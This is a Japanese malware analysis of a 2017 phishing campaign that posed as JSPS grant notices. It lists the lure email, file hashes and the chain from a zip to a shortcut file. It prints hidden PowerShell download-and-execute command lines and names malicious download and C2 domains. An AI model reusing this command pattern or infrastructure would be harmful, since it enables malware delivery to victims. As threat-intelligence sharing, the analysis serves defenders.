2017年1月17日に日本学術振興会より同組織を装った不審なメールが発生しているという注意喚起が出されました。(魚拓)
翌日の2017年1月18日には、明治大学からの注意喚起。(魚拓)
2017年1月20日には中央大学から注意喚起が出されました。(魚拓)
そちらの標的型攻撃メールについて調査しましたので、そちらの調査結果を共有します。
まず、上記の注意喚起から得られた標的型攻撃メールの情報は以下の通りです。
| メール情報 | ||
| 項目名 | 内容 | 備考 |
| 送信元メールアドレス | [email protected] | xxxxxxxx部分は恐らく伏字。 |
| 件名 | 【H29科研費】繰越申請について | |
| 添付ファイル | 【H29科研費】繰越申請について.zip | 展開パスワードが設定されている。 |
| 本文 | お世話になっております。 今年度の科学研究費助成事業(科学研究費補助金)の 繰越についてお知らせいたします。 翌年度に繰り越すことができるのは、計画の変更等に伴い当該年度中に使用する ことができなかった科研費です。例えば、研究計画の終了後に余った科研費は、 繰越の対象にはなりません。 ■申請の有無についての回答期限 平成29年1月26日(木) 12時【厳守】 ■○○係提出期限 平成29年2月2日(木) 12時【厳守】 ―――共通―――――――――――――――――――――――――――――― ※特別研究員奨励費の場合、最終年度の方は科研費を繰り越すことができません。 ※基金化されている課題については、手続きなく繰越が可能です。 ※他機関から配分を受けている分担金の場合、繰越申請は代表者の研究機関にて 取りまとめます。締切は各所属機関によって違いますので、速やかに代表者の 先生にご連絡ください。 ご不明な点がございましたら、○○係までご連絡くださいませ。 どうぞよろしくお願いいたします。 —- 日本学術振興会 ○○係 ○○ ○○ [email protected] TEL:03-3263-xxxx FAX:03-3221-xxxx |
〇やxは伏字にされていると考えられる。 |
このメールに添付されていたと考えられるファイルの情報は下記の通りです。
【添付ファイル情報】
| 項目名 | 内容 | 備考 |
| ファイル名 | 【H29科研費】繰越申請について.zip | 展開をするためのパスワードが設定されている。 |
| ハッシュ値 | MD5: EA70F760E7E58A7B22601BA4BD3CEE13 SHA-1: 3C456BE43E01FD048305B0914C4F71E283A2AA0F |
|
| 展開後ファイル名 | 電子申請操作方法 研究者用.zip |
上記ファイルは展開を行うためにパスワードが設定されていました。
そのパスワードは、注意喚起にあったメール本文にあった(共有を行う際に削除された可能性)のか
それとも、そのメールとは別に攻撃者から送られてくるメール内に記載されていたのかということは不明です。
そのため展開のためのパスワードが分かりませんので今回はZipに設定されているパスワードの解析を行いました。
その結果、パスワードが判明したため、そのパスワードを使用して展開しました。
展開後のファイルの情報は下記の通りです。
【展開後ファイル情報 – 1】
| 項目名 | 内容 | 備考 |
| ファイル名 | 電子申請操作方法 研究者用.zip | |
| ハッシュ値 | MD5: 23C5226E6BF83D768720524FB743C8EB SHA-1: E7103C2BBC24087B0326C7E3C521B613D99A503E |
|
| 展開後ファイル名 | H29_c-26.lnk | 「電子申請操作方法 研究者用」フォルダ内に展開される。 |
上記、圧縮ファイルを展開するとショートカットファイルが取り出すことができます。
このファイルに関する情報は下記の通りです。
【展開後ファイル情報 – 2】
| 項目名 | 内容 | 備考 |
| ファイル名 | H29_c-26.lnk | |
| ハッシュ値 | MD5: 0B6845FBFA54511F21D93EF90F77C8DE SHA-1: CC3B6CAFDBB88BD8DAC122E73D3D0F067CF63091 |
|
| ダウンロード先ドメイン | koala.acsocietyy.com | このドメインから悪意のあるファイルをダウンロードし、そのファイルが実行されます。 |
上記ファイルは下図の通りです。
上記ファイルを実行するとPowerShellを利用してダウンロード先ドメインのアクセスし悪意のあるファイルを「koala.acsocietyy.com」からダウンロードします。
実行されるPowerShellのコマンドラインは以下の2つです。
powershell.exe -nop -w hidden -exec bypass -enc エンコードされた文字列
“C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -nop -w hidden -exec bypass -c “IEX (New-Object System.Net.Webclient).DownloadString(‘https://ダウンロード先を短縮したURL’)”
上記のようにPowerShellが実行された後、ダウンロードされたファイルが実行されるのですが
そのファイルは拡張子が「.jpg」となっているものの画像ファイルではなく、シェルコードを含むファイルでした。
そちらのファイルに関する情報は下記の通りです。
【展開後ファイル情報 – 2】
| 項目名 | 内容 | 備考 |
| ファイル名 | 20170112001.jpg | |
| ハッシュ値 | MD5: 6F5648EA4CA8A65C36C328C5AE8AC096 SHA-1: 154669CE22C0B29AF28E0677BC65C43FC35CDD6A |
|
| 通信先ドメイン | hamiltion.catholicmmb.com |
また、上記ファイルが実行された後、通信を行うことに加え、実行したコンピュータ上でMicrosoft Excelが起動し、下図のようにファイルが表示されました。
情報共有は以上です。